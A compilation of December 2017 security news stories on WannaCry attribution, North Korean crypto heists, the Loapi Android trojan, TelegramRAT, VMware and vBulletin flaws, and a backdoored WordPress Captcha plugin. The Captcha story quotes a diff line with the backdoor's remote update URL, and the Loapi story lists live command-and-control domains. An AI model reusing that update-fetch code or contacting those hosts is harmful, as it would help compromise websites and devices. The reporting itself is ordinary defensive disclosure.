Schneider Electric has launched an investigation into this incident. The company said there had been no evidence that the malware exploited any vulnerabilities in its products. The automation giant has advised customers not to leave the device in “Program” mode when it’s not being configured as the malware can only deliver its payload if the controller is set to this mode.

“The fact that this actor has the capability to access the safety instrumentation device, and potentially make changes to the device firmware unnoticed, should make critical infrastructure owner-operators sit up and take heed,” said Emily S. Miller, Director of National Security and Critical Infrastructure Programs at Mocana. “Yes, in this case the malware tripped the safety systems and was noticed, but who’s to say the actor won’t learn from its mistakes or hasn’t already?”


North Korea's New Front: Cyberheists
20.12.2017 securityweek BigBrothers
The messages are alluring, the pictures are attractive. But the women seeking to beguile South Korean Bitcoin executives could actually be hackers from Pyongyang in disguise, experts warn.

In the face of sanctions over its banned nuclear and ballistic missile programs, the cash-strapped North is deploying an army of well-trained hackers with an eye on a lucrative new source of hard currency, they say.

Its cyberwarfare abilities first came to prominence when it was accused of hacking into Sony Pictures Entertainment to take revenge for "The Interview", a satirical film that mocked its leader, Kim Jong-Un.

But it has rapidly expanded from political to financial targets, such as the central bank of Bangladesh and Bitcoin exchanges around the world, with Washington this week blaming it for the WannaCry ransomware that wreaked havoc earlier this year.

And a South Korean cryptocurrency exchange shut down on Tuesday after losing 17 percent of its assets in a hacking -- its second cyberattack this year, with the North accused of being behind the first.

According to multiple South Korean reports citing Seoul's intelligence agency, North Korean hackers approach workers at digital exchanges by posing as beautiful women on Facebook, striking online conversations and eventually sending files containing malicious code.

North Korea Cyber AttacksThey also bombard executives with emails posing as job seekers sending resumes -- with the files containing malware to steal personal and exchange data.

Moon Jong-Hyun, director at Seoul cybersecurity firm EST Security, said the North had stepped up online honeytrap tactics targeting Seoul's government and military officials in recent years.

"They open Facebook accounts and maintain the online friendship for months before backstabbing the targets in the end," Moon told a cybersecurity forum, adding many profess to be studying at a US college or working at a research think tank.

- 'Criminal enterprise' -

Simon Choi, director of Seoul cybersecurity firm Hauri, has accumulated vast troves of data on Pyongyang's hacking activities and has been warning about potential ransomware attacks by the North since 2016.

The United States has reportedly stepped up cyberattacks of its own against Pyongyang.

But Choi told AFP: "The North's hacking operations are upgrading from attacks on 'enemy states' to a shady, lucrative moneymaking machine in the face of more sanctions."

Pyongyang's hackers have showed interest in Bitcoin since at least 2012, he said, with attacks spiking whenever the cryptocurrency surges -- and it has soared around 20-fold this year.

US cybersecurity firm FireEye noted that a lack of regulations and "lax anti-money laundering controls" in many countries make digital currencies an "attractive tactic" for the North.

Cryptocurrencies, it said in a September report, were "becoming a target of interest by a regime that operates in many ways like a criminal enterprise".

It documented three attempts by the North to hack into Seoul cryptocurrency exchanges between May and July as a way to "fund the state or personal coffers of Pyongyang's elite".

In October, Lazarus, a hacking group linked with the North, launched a malicious phishing campaign targeting people in the bitcoin industry with a fake but lucrative job offer, according to US cybersecurity firm Secureworks.

- 'Hard to predict' -

Hacking attacks targeting digital currencies are only the latest in the long list of alleged online financial heists by the North.

The North is blamed for a massive $81 million cyber-heist from the Bangladesh Central Bank (BCB) in 2016, as well as the theft of $60 million from Taiwan's Far Eastern International Bank in October.

Although Pyongyang has angrily denied the accusations -- which it described as a "slander" against the authorities -- analysts say the digital footprints left behind suggest otherwise.

The attack on the BCB was linked to "nation-state actors in the North", cybersecurity firm Symantec said, while the Taiwanese bank theft had some of the "hallmarks" of Lazarus, according to the British defence firm BAE Systems.

Proceeds from such actions are laundered through casinos in the Philippines and Macau or money exchanges in China, said Lim Jong-In, a cyber-security professor at Korea University in Seoul, making it "virtually impossible" to trace.

The global WannaCry ransomware attack in May infected some 300,000 computers in 150 nations, encrypting their files and demanding hundreds of dollars from their owners for the keys to get them back.

Experts say that young hacking talents are handpicked at school to be groomed at elite Kim Chaek University of Technology or Kim Il Sung Military University in Pyongyang, and now number more than 7,000.

They were once believed to be operating mostly at home or neighbouring China, but analysis by cybersecurity firm Recorded Future noted "significant physical and virtual North Korean presences" in countries as far away as Kenya and Mozambique.

FireEye CEO Kevin Mandia put the North among a quartet of countries -- along with Iran, Russia and China -- that accounted for more than 90 percent of cybersecurity breaches the firm dealt with.

Its hackers, he said, were "interesting to respond to and hard to predict".


Australia, Canada, Others Blame North Korea for WannaCry Attack
20.12.2017 securityweek BigBrothers
The United States is not the only country to officially accuse North Korea this week of being behind the WannaCry ransomware campaign. Canada, Japan, Australia and New Zealand have also blamed Pyongyang for the attack.

The U.K. accused North Korea in late October, and the other Five Eyes countries and Japan have now done the same.

“We are aware of the statements made by our allies and partners concerning the role of actors in North Korea in the development of the malware known as WannaCry,” said Greta Bossenmaier, chief of Canada’s Communications Security Establishment (CSE). “This assessment is consistent with our analysis.”

Australia said its own intelligence agencies reached the same conclusion after consultations with allies. New Zealand attributed the WannaCry attack to North Korean threat actors based on “cyber threat analysis from a range of sources, including the United States and the United Kingdom.”

The WannaCry ransomware was unleashed in May and it infected roughly 300,000 computers across 150 countries. The malware spread using exploits developed by the Equation Group, an actor linked to the U.S. National Security Agency (NSA).

North Korea in October denied the accusations, claiming that they were a “wicked attempt" to further tighten international sanctions. Furthermore, not everyone believes North Korea is responsible. Endpoint security firm Cybereason said in May that the attack did not fit Pyongyang’s style and interests, and the company stands by its initial assessment.

Nevertheless, the United States is convinced that the WannaCry attack is the work of North Korea, which is believed to be responsible for several recent profit-driven campaigns. “We do not make this allegation lightly,” said White House homeland security advisor Tom Bossert. “We do so with evidence, and we do so with partners.”

One of those partners is Microsoft, which concluded that the North Korea-linked threat actor known as Lazarus – the company tracks it as ZINC – was responsible for the ransomware attack.

“Among other steps, last week we helped disrupt the malware this group relies on, cleaned customers’ infected computers, disabled accounts being used to pursue cyberattacks and strengthened Windows defenses to prevent reinfection. We took this action after consultation with several governments, but made the decision independently,” said Brad Smith, president and chief legal officer at Microsoft.

“We are pleased to see these governments making this strong statement of attribution. If the rising tide of nation-state attacks on civilians is to be stopped, governments must be prepared to call out the countries that launch them,” Smith said.

Facebook also had a role in disrupting the activities of the Lazarus group, but pointed out that its actions were not focused on the WannaCry malware itself.

“In this case, we deleted accounts operated by this group to make it harder for them to conduct their activities. Similar to other threat groups, they largely used personal profiles and pretended to be other people in order to do things like learning about others and building relationships with potential targets,” the social media giant stated.

“We also notified people who may have been in contact with these accounts and gave suggestions to enhance their account security, as we have done in the past about other threat groups,” it added.


Code Execution Flaws Patched in Several VMware Products
20.12.2017 securityweek
Vulnerebility
VMware has released patches and updates for its ESXi, vCenter Server Appliance (vCSA), Workstation and Fusion products to address a total of four vulnerabilities, including ones that can be exploited for arbitrary code execution.

Two of the code execution flaws, discovered by researchers at Cisco Talos, affect the remote management functionality of VMware ESXi, Workstation and Fusion. While VMware has classified them as having “important” severity, Cisco believes they are critical and assigned them a CVSS score of 9.0.

One of these security holes, CVE-2017-4941, allows a remote attacker to execute code in a virtual machine via an authenticated virtual network computing (VNC) session.

“A specially crafted set of VNC packets can cause a type confusion resulting in stack overwrite, which could lead to code execution. An attacker can initiate a VNC session to trigger this vulnerability,” Cisco Talos said in an advisory.

The second vulnerability found by Cisco researchers also allows an attacker to execute arbitrary code in a virtual machine using specially crafted VNC packets. The bug, described as a heap overflow, is tracked as CVE-2017-4933.

VMware pointed out that exploitation of these flaws is possible in ESXi only if VNC is manually enabled in a virtual machine’s configuration file and the application is set to allow VNC traffic through the built-in firewall.

Another flaw patched this week by VMware is CVE-2017-4940, a stored cross-site scripting (XSS) issue affecting the ESXi Host Client. The weakness, discovered by Alain Homewood of Insomnia Security, allows an attacker to inject code that gets executed when users access the Host Client.

The last vulnerability is a privilege escalation affecting vCSA. Identified by Lukasz Plonka and tracked as CVE-2017-4943, the security hole is related to the showlog plugin and it allows an attacker with low privileges to obtain root level access to the appliance’s base operating system.

VMware fixed the vulnerabilities with the release of six different patches for ESXi, version 12.5.8 of Workstation, version 8.5.9 of Fusion, and version 6.5 U1d of vCSA.


vBulletin Patches Disclosed Vulnerabilities
20.12.2017 securityweek
Vulnerebility
vBulletin developers announced on Tuesday that they have patched two recently disclosed vulnerabilities that can be exploited by a remote attacker to execute arbitrary code and delete files from the server.

The flaws were disclosed last week by Beyond Security. One of the security holes is a file inclusion issue that affects Windows-based vBulletin installations. It allows an unauthenticated attacker to inject malicious PHP code into a file on the server and “include” that file by manipulating the routestring= parameter in a request, which results in the code getting executed.

The second vulnerability, identified as CVE-2017-17672, is a deserialization issue that can be exploited by an unauthenticated attacker to delete arbitrary files and possibly even execute arbitrary code.

Beyond Security said the flaws were reported to vBulletin on November 21, but the developers of the forum software told SecurityWeek they only learned about them last week. By Monday, a patch had already been developed and was being tested.

The vulnerabilities impact versions 5.3.2, 5.3.3 and 5.3.4. Fixes were rolled out on Tuesday with the release of vBulletin 5.3.4 Patch Level 1, 5.3.3 Patch Level 1, and 5.3.2 Patch Level 2. Forums hosted on vBulletin Cloud have been patched automatically.

“Two potential issues have been identified in vBulletin 5.3.2 and higher,” said Wayne Luke, vBulletin Technical Support Lead. “The first affects the template rendering functionality and could lead to arbitrary file deletion. The second allows the possibility of remote file inclusion via the legacy routing system on Windows servers. We have applied fixes for these issues. It is recommended that you apply this patch as soon as possible.”

It’s important that vBulletin forum administrators patch their installations as soon as possible. Malicious actors can quickly start exploiting the flaws in the wild, especially since technical details and proof-of-concept (PoC) code have been made available for both vulnerabilities.


Windows 10 Hello facial recognition feature can be spoofed with photos
20.12.2017 securityaffairs Safety

Experts discovered that the Windows 10 facial recognition security feature Hello can be spoofed using a photo of an authorized user.
Security experts at pen-test firm Syss have discovered that the Windows 10 facial recognition security feature dubbed Hello can be spoofed in the simplest way, using a photo of an authorized user.

“Microsoft face authentication in Windows 10 is an enterprise-grade identity verification mechanism that’s integrated into the Windows Biometric Framework (WBF) as a core Microsoft Windows component called Windows Hello. Windows Hello face authentication utilizes a camera specially configured for near infrared (IR) imaging to authenticate and unlock Windows devices as well as unlock your Microsoft Passport.”

The bad news for the users is that even if they have installed the fixed versions shipped in October (builds 1703 or 1709) the technique is effective. In this scenario, users need to set up the facial recognition from scratch to make it resistant to the attack.

“Due to an insecure implementation of the biometric face recognition in some Windows 10 versions, it is possible to bypass the Windows Hello face authentication via a simple spoofing attack using a modified printed photo of an authorized person.” states the security advisory published on Full Disclosure.

The attack devised by the researchers works on both the default config, and Windows Hello with its “enhanced anti-spoofing” feature enabled.

“Thus, by having access to a suitable photo of an authorized person (frontal face photo), Windows Hello face authentication can easily be bypassed with little effort, enabling unauthorized access to the Windows system.” reads the

“Both, the default Windows Hello configuration and Windows Hello with the enabled “enhanced anti-spoofing” feature on different Windows 10 versions are vulnerable to the described spoofing attack and can be bypassed. If “enhanced anti-spoofing” is enabled, depending on the targeted Windows 10 version, a slightly different modified photo with other attributes has to be used, but the additional effort for an attacker is negligible. In general, the simple spoofing attack is less reliable when the “enhanced anti-spoofing” feature is enabled.”

Win10 Hello facial recognition

The Proof of Concept (PoC) detailed by the researchers worked against a Dell Latitude running Windows 10 Pro, build 1703; and a Microsoft Surface Pro running 4 build 1607.

The experts tried to use the “enhanced anti-spoofing” feature on Surface Pro’s , but claimed its “LilBit USB IR camera only supported the default configuration and could not be used with the more secure face recognition settings.”

They successfully bypassed the default Windows Hello configuration on both test devices running all tested Windows 10 versions.

 

 

 


Loapi Android malware can destroy your battery mining Monero
20.12.2017 securityaffairs Android

Experts from Kaspersky have spotted an Android malware dubbed Loapi that includes a so aggressive mining component that it can destroy your battery.
Researchers from security firm Kaspersky Lab have spotted a new strain of Android malware dubbed Loapi lurking in fake anti-virus and porn applications, that implements many features, including cryptocurrency mining.

Loapi can be used to perform a wide range of malicious activities, thanks to a modular architecture it can be used to take part in a DDoS botnet or bombard infected handsets with advertisements.

The strain of malware analyzed by Kaspersky when running a few days to mine the Monero cryptocurrency physically damaged the device due to the load caused by the activity.

“Because of the constant load caused by the mining module and generated traffic, the battery bulged and deformed the phone cover.” reads the analysis published by Kaspersky.

Loapi malware 3

According to the researchers, the Loapi malware is able to destroy an Android device in just 2 days.

Loapi android-malware

The Loapi malware communicates with the following command and control servers:

ronesio.xyz (advertisement module) – A module used for the aggressive display of advertisements on the infected handset.
api-profit.com:5210 (SMS module and mining module) – A module used for the manipulations of text messages. It periodically sends requests to the C&C server to obtain relevant settings and commands.
mnfioew.info (web crawler); A module used for hidden Javascript code execution on web pages with WAP billing in order to subscribe the user to various services
mp-app.info (proxy module) – A module that implements an HTTP proxy server that allows the attackers to send HTTP requests from the device. It is the component used to power DDoS attacks.
Experts believe the gang behind the Loapi malware is the same responsible for the 2015 Android malware Podec.

The Loapi malware was distributed through third-party app stores and advertising campaigns.

“Malicious files are downloaded after the user is redirected to the attackers’ malicious web resource. We found more than 20 such resources, whose domains refer to popular antivirus solutions and even a famous porn site. As we can see from the image below, Loapi mainly hides behind the mask of antivirus solutions or adult content apps” continues the analysis.

Loapi malware 2.png

Once installed, the Loapi malware tries to obtain ‘device administrator’ permissions by looping a pop-up until a victim clicks yes.

The sample analyzed by Kaspersky checks if the device is rooted, but never subsequently uses root privileges, experts believe cybercriminals will use them in some new module in the future for example to implements spyware features.

Researchers pointed out that the Android malware “aggressively fights any attempts to revoke device manager permissions” by locking the screen and closing phone windows by itself.


Backdoor in Captcha Plugin poses serious risks to 300K WordPress sites
20.12.2017 securityaffairs Hacking

Experts discovered that the popular WordPress Captcha plugin installed on over 300,000 sites was recently updated to deliver a hidden backdoor.
Security experts at WordFence have discovered that the popular WordPress Captcha plugin installed on over 300,000 sites was recently updated to deliver a hidden backdoor. The WordPress team promptly removed the plugin from the official WordPress Plugins repository and provided sanitized versions for affected customers.

WordPress also blocked the author of the plug-in from publishing updates without the review of its development team, WordFence now includes firewall rules to block Captcha and five other plugins from the same author.

WordFence has worked with the WordPress plug-in team to patch pre-4.4.5 versions of the plug-in.

The WordPress team noticed something of strange in September, when the plug-in changed hands. Just three months later the new team distributed the backdoored version Captcha 4.3.7.

Experts found a code triggering an automatic update process that downloads a ZIP file from:

https://simplywordpress[dot]net/captcha/captcha_pro_update.php
then extracts and installs itself modifying the install of the Captcha plugin running on WordPress site.

“Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related. Wordfence alerts users when any plugin they are running is removed from WordPress repo as well. At the time of its removal, Captcha had over 300,000 active installs, so its removal significantly impacts many users.” states the analysis published by WordPress.

“A backdoor file allows an attacker, or in this case, a plugin author, to gain unauthorized administrative access to your website. This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself.”

1 < $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
2 ---
3 > $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';

WordFence investigated the new ownership of the plugin, it noticed that the domain used to deliver the ZIP file containing the backdoor is simplywordpress[.]net that is registered to someone named Stacy Wellington using the email address scwellington@hotmail.co.uk.

It was easy to discover that the same email address was used to register a large number of other domains and the footer of one of them referenced Martin Soiza.

In September, around 200,000 WordPress websites using the Display Widgets Plugin were impacted after it was updated to include malicious code. Further investigation allowed the experts at WordFence to discover that the man behind plugin spam was the Briton Mason Soiza (23) who bought the plugin in late May.

WordFence discovered that also other plug-ins from the simplywordpress domain ( Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange) contain the same backdoor code.

According to the researchers, the backdoor was used to create cloaked backlinks to various payday loan businesses in order to boost their Google rankings.

“If you have not read our previous post on Mason Soiza, I’d suggest you read that first, since he has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them.” states WordPress.

“The hostmaster email address is the same for both simplywordpress.net and unsecuredloans4u.co.uk (Stacy Wellington scwellington@hotmail.co.uk).”

Let me close with simple recommendation provided by the experts, hurry up,uninstall the Captcha plugin immediately from your site.


Singapore Issues Cryptocurrency Warning
19.12.2017 securityweek Security

Singapore Tuesday issued a warning about cryptocurrencies after a recent surge in prices sent investors flocking to bitcoin.

"The Monetary Authority of Singapore advises the public to act with extreme caution and understand the significant risks they take on if they choose to invest in cryptocurrencies," the city-state's central bank said in a statement.

"MAS is concerned that members of the public may be attracted to invest in cryptocurrencies, such as Bitcoin, due to the recent escalation in their prices."

It said the recent spike in bitcoin prices comes from speculation, and cautioned that the bubble may burst.

Singapore's central bank joins a number of regulators who have warned about cryptocurrency investments, including the US Federal Reserve, which said bitcoin could threaten financial stability.

Regulators in Seoul have banned South Korean financial institutions from dealing in virtual currencies.

The MAS, which also acts as a financial regulator in the city-state, noted that cryptocurrencies are not backed by any central bank and are unregulated, which means those who lose money after investing in them have no room for redress under Singapore law.

"There is also a risk of loss should the cryptocurrency intermediary be hacked, as it may not have sufficiently robust security features," the regulator said.

Earlier on Tuesday, a South Korean virtual currency exchange declared itself bankrupt after being hacked for the second time in a year.

The closure comes eight months after nearly 4,000 bitcoin -- then valued at 5.5 billion won ($5 million), nearly 40 percent of the exchange's total assets -- were stolen in a cyber-attack blamed on North Korea.

Global bitcoin prices have soared around 20-fold this year, with the cryptocurrency trading above $18,000 on Tuesday.

Created in 2009 as a piece of encrypted software, bitcoin been used to buy everything from beer to pizza, and is increasingly accepted by major companies such as online travel giant Expedia.

Analysts have put the surge down to growing acceptance among traditional investors and a decision by US regulators to allow bitcoin futures to trade on major exchanges.

Previously only traded on specialist platforms, bitcoin started trading on the Cboe Futures Exchange earlier this month before hitting the major Chicago Mercantile Exchange (CME) on Monday.


Loapi Android Trojan Does All Sorts of Bad
19.12.2017 securityweek Android
A recently discovered Android malware features a modular architecture that allows it to perform a broad range of nefarious activities, Kaspersky Lab researchers warn.

Detected by Kaspersky as Trojan.AndroidOS.Loapi, the malicious program was found masquerading as antivirus solutions or adult content apps. Its capabilities, the security researchers say, range from mining for cryptocurrencies to displaying a constant stream of ads and to launching distributed denial of service (DDoS) attacks, among others.

The mobile threat was observed distributed via advertising campaigns that redirected users to the attackers’ malicious websites. After installation, the malware attempts to gain device administrator rights, continuously requesting them in a loop. Although it checks whether the device is rooted, the Trojan doesn’t use root privileges.

If the user gives in and grants the malicious app admin privileges, Loapi either hides its icon in the menu or simulates antivirus activity. The displayed behavior depends on the type of application it masquerades as, Kaspersky has discovered.

The Trojan can prevent users from revoking its device manager permissions by locking the screen and closing the window with device manager settings. Moreover, the malware receives from the command and control (C&C) server a list of apps that could pose a danger and uses it to monitor the installation and launch of those apps.

When such an app is installed or launched, the Trojan displays a fake message claiming it has detected malware, prompting the user to delete it. The message is displayed in a loop, thus preventing the user from dismissing it until the application is deleted.

At installation, Loapi receives from the C&C lists of modules to install or remove, a list of domains that serve as C&C, an additional reserved list of domains, the list of “dangerous” apps, and a flag whether to hide its app icon. At a third stage during the process, the necessary modules are downloaded and initialized.

An advertisement module is used to aggressively display ads on the device, but can also be used to open URLs, create shortcuts, show notifications, open pages in popular social network apps (including Facebook, Instagram, VK), and download and install other applications.

An SMS module can perform various text message manipulation operations. Based on C&C commands, it can send inbox SMS messages to attackers’ server, reply to incoming messages, send SMS messages with specified text to specified number, delete SMS messages from inbox and sent folder, and execute requests to URL and run specified JavaScript code in the page received as response.

A Web crawling module can subscribe users to services by covertly executing JavaScript code on web pages with WAP billing, in addition to performing web page crawling. Should operators send text messages asking for confirmation, the SMS module is employed to reply with the required text. Together with the ad module, it was observed attempting to open 28,000 unique URLs on a single device during a 24-hour experiment.

The Trojan also packs a proxy module that allows attackers to send HTTP requests from the victims’ devices via an HTTP proxy server. This feature allows the malware authors to organize DDoS attacks against specified resources or to change the Internet connection type on a device, the security researchers warn.

Another module uses the Android version of minerd to mine for the Monero (XMR) cryptocurrency.

According to Kaspersky, Loapi might be related to the Podec malware (Trojan.AndroidOS.Podec), as both threats use the same C&C server IP address, both use the same obfuscation, and feature similar ways of detecting superuser on the device. Moreover, both collect information with similar structure and content and send it in JSON format to the C&C during the initial stage.

“Loapi is an interesting representative from the world of malicious Android apps. Its creators have implemented almost the entire spectrum of techniques for attacking devices […]. The only thing missing is user espionage, but the modular architecture of this Trojan means it’s possible to add this sort of functionality at any time,” Kaspersky concludes.


Successor to NetTraveler Malware Dissected
19.12.2017 securityweek
Virus
A recently observed backdoor could be intended as the successor of the NetTraveler malware, Kaspersky Lab security researchers report.

NetTraveler has been around for more than a decade, but has recently resurfaced in a series of cyber-espionage attacks launched against victims in Russia and neighboring European countries. Several years ago, the malware was associated with a campaign that hit targets in over 40 countries.

The malware was designed for surveillance purposes, and a new variant referred to as Travle or PYLOT appears to have emerged earlier this year. Supposedly the offspring of a Chinese-speaking actor, the new threat gets its name from a typo in a string in one of the analyzed samples: “Travle Path Failed!” (the typo has been corrected in newer releases).

The malware was observed being deployed using malicious documents delivered via spear-phishing attacks on Russian-speaking targets. The executables were maintained in encrypted form using a technique previously used to conceal Enfal, and then the Microcin APT family.

Travle command and control (C&C) domains often overlap with those of Enfal, which in turn was observed using the same encryption method for maintaining the C&C URL as NetTraveler. Thus, Kaspersky believes that Enfal, NetTraveler, Travle and Microcin are related to each other and that the Travle backdoor is the successor of NetTraveler.

Upon initializing communication with its C&C server, the malware sends information about the target operating system in an HTTP POST request. Sent information includes UserID (based on the computer name and IP-address), Computer name, Keyboard layout, OS version, IP-addresses, and MAC address.

The server responds by sending URL paths for receiving commands, for reporting on command execution results, and for downloading and uploading files from C&C. The server also provides the first and second RC4 key, and an ID. After receiving the packet, the backdoor waits for additional commands.

All communication with the server is encrypted, with the ciphering algorithm depending on the type of transmitted object. The bot can send technical messages, which contain information about the OS or about the performed commands, and operational messages, which contain lists of files in a directory or the content of a specific file.

Based on commands received from the C&C, the malware can scan the file system, can execute specified batch file or application with passed arguments, can check if a specified file exists, can delete/rename/move/create files, can download and execute files (scripts or BAT-files), can download DLLs and launch them using the LoadLibrary API function, and can load/unload a library to/from memory.

According to Kaspersky, the actor behind the Travle backdoor has been active during the last few years but doesn’t appear worried about being tracked by security companies. In fact, all of the modifications and new additions they made to their tools have been discovered and detected quite quickly.

“Still, the fact that they didn´t really need to change their TTPs during all these years seems to suggest that they don´t need to increase their sophistication level in order to fulfill their goals. What’s worse, according to subjects of decoy documents these backdoors are used primarily in the CIS region against government organizations, military entities and companies engaged in high-tech research, which indicates that even high-profile targets still have a long way to go to implement IT-sec best practices which efficiently resist targeted attacks,” Kaspersky concludes.


South Korea cryptocurrency exchange Youbit shuts down after second hack in 2017
19.12.2017 securityaffairs Hacking

The South Korea Cryptocurrency Exchange Youbit has gone bankrupt.after suffering a major cyber attack for the second time this year.
The South Korea Cryptocurrency Exchange Youbit shuts down after suffering a major cyber attack for the second time this year. The company announced bankrupt on Tuesday after being hacked for the second time in the last eight months, the company declared it had lost 17 percent of its assets in the last attack.

This is the first time that a cryptocurrency exchange based in South Korean has gone bankrupt.

Eight months ago hackers stole nearly 4,000 bitcoin (5.5 billion won ($5 million) at the time of the hack) that accounted for nearly 40 percent of the Youbit exchange’s total assets.Lazarus targets Bitcoin company

Lazarus targets Bitcoin company

“We will close all trades, suspend all deposits or withdrawals and take steps for bankruptcy,” reads the statement issued by the company after the last attack.

In order to minimize the economic impact of the customers, all the clients will have their cryptocurrency assets marked down by 25 percent, in this way Youbit wants to cover the losses selling the remaining assets and using insurance.

The South Korean market for virtual currencies has become one of the most active, considering that whose trades account for some 20 percent of global Bitcoin transactions. More than one million South Koreans already invested in Bitcoin.

Analysts observed that the demand is very high, for this reason, prices for the unit are around 20 percent higher than in the US.

While global bitcoin prices continue to increase, threat actors are focusing their interests on the virtual currencies.

Recently security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.


U.S. blames North Korea for the massive WannaCry ransomware attack
19.12.2017 securityaffairs
Ransomware

It’s official, according to Tom Bossert, homeland security adviser, the US Government attributes the massive ransomware attack Wannacry to North Korea.
It’s official, the US Government attributes the massive attack Wannacry to North Korea.

The news of the attribution was first reported by The Wall Street Journal, according to the US Government, the WannaCry attack infected millions of computers worldwide in May is an act of Information Warfare.

WannaCry infected 200,000 computers across 150 countries in a matter of hours last week, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

The ransomware infected systems in any industry and also targeted critical infrastructures such as hospitals and banks.

wannacry ransomware medical devices
WannaCry ransomware on a Bayer radiology system – Source Forbes

In October, the UK Government linked the WannaCry attack that crippled NHS to North Korea.

“This attack, we believe quite strongly that it came from a foreign state,” Ben Wallace, a junior minister for security, told BBC Radio 4’s Today programme.

“North Korea was the state that we believe was involved in this worldwide attack,” he said, adding that the government was “as sure as possible”.

The attack caused billions of dollars damages, now the United States Homeland Security Advisor Tom Bossert officially blamed Noth Korea for the attack declaring that the US Government has collected evidence that Link Pyongyang to the massive WannaCry attack.

“The attack was widespread and cost billions, and North Korea is directly responsible,” Tom Bossert, homeland security adviser to President Donald Trump, wrote in an article published by the Wall Street Journal.

“North Korea has acted especially badly, largely unchecked, for more than a decade, and its malicious behavior is growing more egregious,” “WannaCry was indiscriminately reckless.”

The US government was expected to follow up with an official statement blaming North Korea for the attack.

The US Government has collected irrefutable proofs that link the North Korea APT Lazarus Group to WannaCry, with a “very high level of confidence” the APT carried out the WannaCry attack.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

The North Korean government hasn’t yet commented the allegation.


New TelegramRAT Exploits Recently Patched Office Vulnerability
19.12.2017 securityweek
Vulnerebility
A recently discovered Remote Access Trojan (RAT) is being distributed via documents that exploit a 17-year old Office vulnerability patched in November 2017, Netskope warns.

Dubbed TelegramRAT, the malware leverages the Telegram Messenger application for command and control (C&C), and abuses a cloud storage platform to store its payload. This approach allows the threat to evade some traditional security scanners.

Attacks involving TelegramRAT start with a malicious Office document exploiting CVE-2017-11882, a vulnerability that was introduced in the Microsoft Equation Editor (EQNEDT32.EXE) in November 2000. The bug remained unnoticed for 17 years, until Microsoft manually patched it last month, but it didn’t take long for malicious actors to start abusing it.

As part of the newly observed attack, the Bit.ly URL redirection service is used to conceal the TelegramRAT payload hosted on Dropbox. The malware uses the Telegram BOT API to receive commands and send responses to the attacker. By employing SSL cloud applications for infection and C&C operations, the malware can keep communication hidden from security applications.

“The payload executable strings contained lots of references to Python files. After a quick analysis, the payload looked to be a Python program converted into a standalone binary executable that contained everything needed to run the application,” Netskope says.

Because the Python interpreter, the application code, and all the required libraries are packaged, the executable is large in size, which also makes it less suspicious.

Within the extracted directory, the researchers found PYD files, DLL files, and an out00-PYZ.pyz_extracted folder containing .pyc files. They also discovered a file called “RATAttack” which points to an open-source “RAT-via-Telegram” on GitHub.

The attackers used almost the exact code from GitHub when compiling their Python executable, the security researchers have discovered.

By using Telegram, which supports encrypted communication, the attackers ensure that they can easily communicate with the target without anyone snooping into the communication. The RAT’s authors create a Telegram bot and embed the bot’s Telegram token into the TelegramRAT’s configuration file. The malware then connects to the bot’s Telegram channel, where the attacker can issue commands for the infected machines.

Based on the received commands, the malware can take screenshots, execute shell commands, copy files, delete files/folders, download file from target, encode local files and decode them, enable/disable keyboard freeze, get Google Chrome’s login/passwords, record microphone, get keylogs, get PC information, open a proxy server, reboot/shut down the machine, run a file, schedule a command to run at specific time, display services and processes running, and update executable.

“TelegramRAT offers another unfortunate instance of attackers recognizing that the cloud can be leveraged to evade many traditional security scanners. By making itself cloud native, TelegramRAT uses one cloud application for its payload host, and another for its C&C operation. This cloud application splicing offers resilience to the attack, and requires security scanners to be able to discern cloud application instances, and to inspect SSL traffic to be effective,” Netskope concludes.


Australia Police Accidentally Broadcast Arrest Plans on Social Media
19.12.2017 securityweek BigBrothers
Australian police accidentally broadcast on social media details of an operation to arrest a suspected North Korean agent -- three days before he was taken into custody, media reported Wednesday.

The Sydney-based man, described by authorities as a "loyal agent of North Korea", was arrested on Saturday and charged with trying to sell missile parts and technology on the black market to raise money for Pyongyang in breach of international sanctions.

But a minute of conversation about the case between federal police officers, including the timing of the arrest, was broadcast on Periscope Wednesday and linked to on Twitter, The West Australian reported Tuesday.

The newspaper said it had listened to the discussion, which included a suggestion that officers are "not going in all guns blazing, it's only half-a-dozen people and a forensic van".

The paper added that while the tweet was deleted, the broadcast remained live -- and was watched by 40 people -- before it was also removed after the publication alerted federal police.

It was only by luck that no details of the identity of the target were revealed, the West Australian added.

Federal police confirmed part of a conversation was mistakenly broadcast via its Periscope account while "testing a piece of social media broadcasting equipment".

"Steps have been taken to ensure such incidents will not occur again," the force said in a statement.

"The matter has been referred to the AFP's security area for review."

AFP [Australian Federal Police] Assistant Commissioner Neil Gaughan told reporters on Sunday that the case involving the alleged agent was "like nothing we have ever seen on Australian soil".

He added that the 59-year-old suspect, named in local media as Chan Han Choi, was a "loyal agent of North Korea, believing he was acting to serve some higher patriotic purpose".

Choi, who is in custody, is due back in court this week.


South Korea Cryptocurrency Exchange Shuts Down After Hacking
19.12.2017 securityweek Hacking
A South Korean exchange trading bitcoin and other virtual currencies declared itself bankrupt on Tuesday after being hacked for the second time this year, highlighting the risk over cryptocurrencies as they soar in popularity.

The Youbit exchange said it had lost 17 percent of its assets in the attack on Tuesday.

It came eight months after nearly 4,000 bitcoin -- then valued at 5.5 billion won ($5 million) and nearly 40 percent of the exchange's total assets -- were stolen in a cyber attack blamed on North Korea.

